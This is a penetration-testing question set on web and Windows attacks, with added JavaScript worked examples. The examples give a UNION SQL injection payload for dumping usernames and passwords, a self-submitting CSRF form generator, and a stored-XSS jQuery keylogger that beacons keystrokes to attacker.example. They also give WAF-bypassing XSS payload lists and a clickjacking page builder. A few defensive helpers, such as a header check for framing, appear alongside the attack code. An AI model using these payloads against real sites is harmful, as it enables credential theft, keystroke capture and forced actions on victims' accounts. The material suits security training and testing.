3. Name five common methods with a high success rate for compromising a Microsoft Windows workstation during an internal assessment.
6. How do viruses and malware communicate with their command-and-control server in an environment that uses a transparent proxy with AD authentication? Provide as much technical detail as possible and mention as many techniques as you know of.
9. Name two different methods for protecting against buffer and stack overflows other than patching. The solution should apply to a Microsoft Windows system.
10. Consider a Wi-Fi assessment. Your target is the CEO's wireless access point on the 12th floor. Given that you are not allowed to physically go to that floor, how can you compromise the wireless network despite the distance?
11. Assume you are performing a web-based penetration test, and that you have no knowledge of the server's PHP code or of the database structure. Describe your step-by-step approach (with technical details) for retrieving the application's usernames and passwords.
Consider the hints below, bearing in mind that we assume you do not know this information, so your answer must be consistent with that assumption. The details are provided only to help you construct your scenario.
Hint 1: The members table is named "users"; the username column is named "username" and the password column is named "password".
Hint 2: Below is the target server code:
<?php
if (isset($_GET['Submit']))
{
    // Retrieve article
    $page_id = $_GET['page_id'];
    $page_id = mysql_real_escape_string($page_id);
    // $result is produced by a query built from $page_id; that query is not shown here
    $title = mysql_result($result, 0, "page_title");
    $body  = mysql_result($result, 0, "page_body");
}
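Added worked example for question 11 (this is not part of the original question set or the target's code). It models in Node.js what the PHP fragment does if $page_id is interpolated unquoted into a numeric WHERE clause: mysql_real_escape_string() only escapes quotes, backslashes and a few control characters, so a payload that contains none of them passes through untouched, and the two hinted column names allow a UNION without any quote character. The query shape in buildQuery(), the table name "pages" and the two-column result are assumptions made for the illustration; the page does not show how $result is built.

```javascript
// Mimics PHP's mysql_real_escape_string(): escapes NUL, \n, \r, \, ', " and ^Z.
function mysqlRealEscapeString(s) {
  return s.replace(/[\0\n\r\\'"\x1a]/g, (c) => {
    switch (c) {
      case '\0': return '\\0';
      case '\n': return '\\n';
      case '\r': return '\\r';
      case '\x1a': return '\\Z';
      default: return '\\' + c; // backslash, single quote, double quote
    }
  });
}

// ASSUMED vulnerable query builder (not from the page): page_id is compared as
// a bare number, so escaping quote characters changes nothing for the attacker.
function buildQuery(pageId) {
  const escaped = mysqlRealEscapeString(pageId);
  return 'SELECT page_title, page_body FROM pages WHERE page_id = ' + escaped;
}

// Hardened counterpart: the parameter must be a plain non-negative integer
// before it reaches the query (a prepared statement would be better still).
function buildQuerySafe(pageId) {
  if (!/^\d+$/.test(pageId)) throw new Error('page_id must be an integer');
  return 'SELECT page_title, page_body FROM pages WHERE page_id = ' + Number(pageId);
}

// UNION payload: no quote characters, only the hinted names. -1 matches no real
// page, so row 0 of the result (the row the PHP reads) is the injected row.
// Two selected columns match the two columns the PHP pulls out.
const PAYLOAD = '-1 UNION SELECT username, password FROM users';

// Crude detector used by the test: does the final SQL carry the injected UNION?
function isInjected(query) {
  return /\bUNION\b/i.test(query) && /\bFROM\s+users\b/i.test(query);
}
```

Usage: send the payload as the page_id GET parameter (with Submit present); the page title and body then render the first username and password hash. In practice the column count and an injectable numeric parameter are discovered first with ORDER BY / UNION SELECT NULL probing and a boolean or time-based check, since the code is not known to the tester.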
13. Provide code that executes a cross-site request forgery based on a POST request.
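Added worked example for question 13 (not part of the original question set). The generator below emits an attacker-hosted page containing a hidden form that submits itself to the target the moment the victim loads it; the browser attaches the victim's cookies for the target site because the request is a plain top-level form POST. The target URL and field names are placeholders chosen for the illustration.

```javascript
// Minimal HTML escaping so attacker-chosen values cannot break out of the
// generated attributes (keeps the generated page well-formed).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Returns a self-submitting POST form. It carries no anti-CSRF token because
// the attacker cannot read one; if the target validates a token, this fails.
// The default enctype (application/x-www-form-urlencoded) is a "simple"
// request, so no CORS preflight is involved.
function csrfPostForm(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join('\n');
  return [
    '<!DOCTYPE html>',
    '<html><body>',
    `  <form id="csrf" method="POST" action="${escapeHtml(action)}">`,
    inputs,
    '  </form>',
    '  <script>document.getElementById("csrf").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Hypothetical target: an "update e-mail address" endpoint (placeholder).
const EXAMPLE_PAGE = csrfPostForm('https://target.example/account/email', {
  email: 'attacker@attacker.example',
  confirm: 'yes',
});
```

Caveat: browsers that default session cookies to SameSite=Lax (Chromium since version 80, with a short grace window for freshly set cookies) will not send those cookies on this cross-site POST, so the attack works only against cookies explicitly set with SameSite=None or on browsers that keep the old default.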
14. Assume you were able to inject JavaScript into the target website (stored XSS). Your goal is to use jQuery (to be stealthy) to gather the victim's keystrokes and, once the user clicks any submit button on the infected page, send the logged keystrokes to your malicious website. You cannot use $.ajax() or $.post() due to cross-domain restrictions in all modern browsers. Describe a method by which you can bypass that through jQuery in order to remain stealthy.
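Added worked example for question 14 (not part of the original question set). The keystroke buffer and URL builder are plain functions; the jQuery wiring at the end records keydown events document-wide and, on any submit-button click, injects an <img> whose src points at the attacker's collector. Image (and $.getScript()) loads are ordinary cross-origin GETs, so the same-origin policy that stops reading an XHR response does not apply. The collector host attacker.example and the "k" parameter are placeholders. Note that a cross-origin $.post() with the default form-encoded body would in fact be sent by the browser (only the response is unreadable), but the question rules it out, so the beacon below uses an image instead.

```javascript
const EXFIL_BASE = 'https://attacker.example/c'; // hypothetical collector URL
const MAX_URL = 2000; // stay under common URL length limits

// Keystroke buffer, kept free of DOM code so it can be exercised under Node.
function createKeyBuffer() {
  const keys = [];
  return {
    push(key) { keys.push(key); },
    drain() { return keys.splice(0, keys.length).join(''); },
    size() { return keys.length; },
  };
}

// Encodes captured text into a GET URL. Oversize input is truncated rather
// than chunked (a real implant would send several beacons); the trailing
// fix-up makes sure no half-written %XX escape is left at the end.
function buildExfilUrl(base, text) {
  const budget = MAX_URL - base.length - '?k='.length;
  let encoded = encodeURIComponent(text);
  if (encoded.length > budget) encoded = encoded.slice(0, budget);
  encoded = encoded.replace(/%[0-9A-F]?$/i, '');
  return `${base}?k=${encoded}`;
}

// Browser-only wiring; guarded so the file also loads under Node for testing.
if (typeof window !== 'undefined' && typeof window.jQuery !== 'undefined') {
  const $ = window.jQuery;
  const buf = createKeyBuffer();

  // Record every key pressed anywhere on the page (named keys in brackets).
  $(document).on('keydown', (e) => {
    buf.push(e.key.length === 1 ? e.key : `[${e.key}]`);
  });

  // On any submit button click, fire the beacon before navigation happens.
  $(document).on('click', 'button[type=submit], input[type=submit]', () => {
    const url = buildExfilUrl(EXFIL_BASE, buf.drain());
    // Cross-origin image GET: no preflight, not blocked by SOP, response ignored.
    $('<img>').attr('src', url).css('display', 'none').appendTo('body');
    // Equivalent jQuery-only alternative: $.getScript(url) loads a cross-origin <script>.
  });
}
```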
15. What are the risks of allowing your web application to be loaded within an IFRAME on another FQDN?
16. Provide as many examples as you can (that work on a fully patched browser) of injecting JavaScript without using script tags.
17. Assume you are performing a web-based vulnerability assessment. You found that when you pass the value "xxxxxxxxxxxxxx" in your request it is reflected inside an image tag. The following event-handler payloads were attempted at that position:
" onmouseover="alert(123)
" onclick="alert(123)
" ondblclick="alert(123)
" onmousedown="alert(123)
" onmousemove="alert(123)
" onmouseout="alert(123)
" onmouseup="alert(123)
" onkeydown="alert(123)
" onkeypress="alert(123)
" onkeyup="alert(123)
However, all of them were blocked by a web application firewall. Assume that the events above are the only events the WAF blocks and that it also blocks the ">" character.
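Added worked example for questions 16 and 17 (not part of the original question set). It models the WAF exactly as question 17 describes it (the listed handlers plus a hard block on ">"), then runs two candidate sets through it: attribute-only vectors that close the reflected attribute and add a handler the list omits, and the usual script-tag-free full-tag vectors question 16 asks for. The model assumes the reflection lands inside an attribute value of an <img> tag, as the question states; the WAF's case handling and exact matching rules are assumptions, since the page does not specify them.

```javascript
// Handlers the question says the WAF blocks.
const BLOCKED_EVENTS = [
  'onmouseover', 'onclick', 'ondblclick', 'onmousedown', 'onmousemove',
  'onmouseout', 'onmouseup', 'onkeydown', 'onkeypress', 'onkeyup',
];

// Assumed WAF model: case-insensitive match on "<handler>=" plus any ">".
function wafBlocks(payload) {
  if (payload.includes('>')) return true;
  const lower = payload.toLowerCase();
  return BLOCKED_EVENTS.some((ev) => new RegExp(`\\b${ev}\\s*=`).test(lower));
}

// Attribute-only vectors (question 17): no ">" needed because the browser
// closes the tag for us; each uses a handler missing from the blocklist.
const ATTRIBUTE_VECTORS = [
  '" onerror="alert(123)',              // fires if the image fails to load
  '" src=x onerror="alert(123)',        // adds a broken src; only helps if the
                                        // reflection comes before the tag's own
                                        // src (first attribute wins in HTML)
  '" onload="alert(123)',               // fires once the image has loaded
  '" tabindex=1 onfocus="alert(123)',   // tabindex makes the img focusable
  '" onpointerover="alert(123)',        // pointer events are not in the list
  '" onwheel="alert(123)',
  '" onmouseenter="alert(123)',         // distinct from the blocked onmouseover
];

// Full-tag vectors without <script> (question 16). All contain ">", so this
// particular WAF stops every one of them; that is why the attribute-only set
// above is the useful one in the question 17 context.
const TAG_VECTORS = [
  '<img src=x onerror=alert(123)>',
  '<svg onload=alert(123)>',
  '<body onload=alert(123)>',
  '<input autofocus onfocus=alert(123)>',
  '<details open ontoggle=alert(123)>',
  '<iframe src="javascript:alert(123)"></iframe>',
  '<a href="javascript:alert(123)">x</a>',
  '<video><source onerror=alert(123)></video>',
];

// Returns the payloads the modelled WAF lets through.
function survivingPayloads(payloads) {
  return payloads.filter((p) => !wafBlocks(p));
}
```

A real engagement would confirm each surviving vector in the browser, since whether onerror or onload fires depends on whether the tag's existing src resolves, and a focus-based handler needs the element to actually receive focus.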
18. Provide IFRAME code that can be used for clickjacking. We are not specific about what you need to clickjack; just show an example against any site of your choice.
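Added worked example for questions 15 and 18 (not part of the original question set). clickjackPage() builds the attacker page: a transparent, full-size iframe of the target stacked above a decoy button, with negative offsets so the target's real button sits exactly under the decoy. framingAllowed() is the defender's side of question 15: given a response's headers it decides whether a browser would let another origin frame the page, applying Content-Security-Policy frame-ancestors first and X-Frame-Options only when the CSP directive is absent, which is how current browsers behave. target.example, the decoy text and the button coordinates are placeholders; port numbers in CSP sources are ignored for brevity.

```javascript
// Keeps attacker-supplied URLs from breaking out of the generated attribute.
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => ({
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
}[c]));

// Where the decoy button is drawn on the attacker page.
const DECOY = { top: 120, left: 120 };

// top/left are the coordinates of the target's real button inside the framed
// page; the iframe is shifted so that button lands under the decoy.
function clickjackPage(targetUrl, { top = 0, left = 0 } = {}) {
  return [
    '<!DOCTYPE html>',
    '<html><head><style>',
    `  #decoy  { position:absolute; top:${DECOY.top}px; left:${DECOY.left}px; z-index:1; padding:1em; }`,
    '  #target { position:absolute; opacity:0; z-index:2; border:0;',
    `            width:1200px; height:800px; top:${DECOY.top - top}px; left:${DECOY.left - left}px; }`,
    '</style></head><body>',
    '  <button id="decoy">Claim your prize</button>',
    `  <iframe id="target" src="${escapeHtml(targetUrl)}"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Matches one frame-ancestors source (exact origin or *.host wildcard) against
// the framing origin. Ports are ignored in this simplified version.
function sourceMatches(source, origin) {
  const o = origin.toLowerCase();
  const host = o.replace(/^[a-z]+:\/\//, '');
  const [, scheme, pattern] = /^(?:([a-z]+):\/\/)?(.+)$/.exec(source);
  if (scheme && !o.startsWith(scheme + '://')) return false;
  if (pattern.startsWith('*.')) return host.endsWith(pattern.slice(1));
  return host === pattern;
}

// true if a page served with these headers can be framed by framerOrigin.
function framingAllowed(headers, selfOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // CSP frame-ancestors wins over X-Frame-Options when present.
  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map((d) => d.trim())
    .find((d) => /^frame-ancestors\b/i.test(d));
  if (fa) {
    const sources = fa.split(/\s+/).slice(1);
    return sources.some((src) => {
      const s = src.replace(/^'|'$/g, '').toLowerCase();
      if (s === 'none') return false;
      if (s === '*') return true;
      if (s === 'self') return framerOrigin === selfOrigin;
      return sourceMatches(s, framerOrigin);
    });
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === selfOrigin;
  // No header, or a value modern browsers ignore (e.g. ALLOW-FROM): framable.
  return true;
}

// Example attacker page against a hypothetical transfer form.
const EXAMPLE_PAGE = clickjackPage('https://target.example/transfer', { top: 300, left: 40 });
```

Usage: open the generated page in a browser while logged in to the target; if the target sends neither header (framingAllowed() returns true), the decoy click lands on the real button. This is the concrete risk behind question 15: any action reachable by a single click or keystroke on the framed page can be triggered by a third-party site.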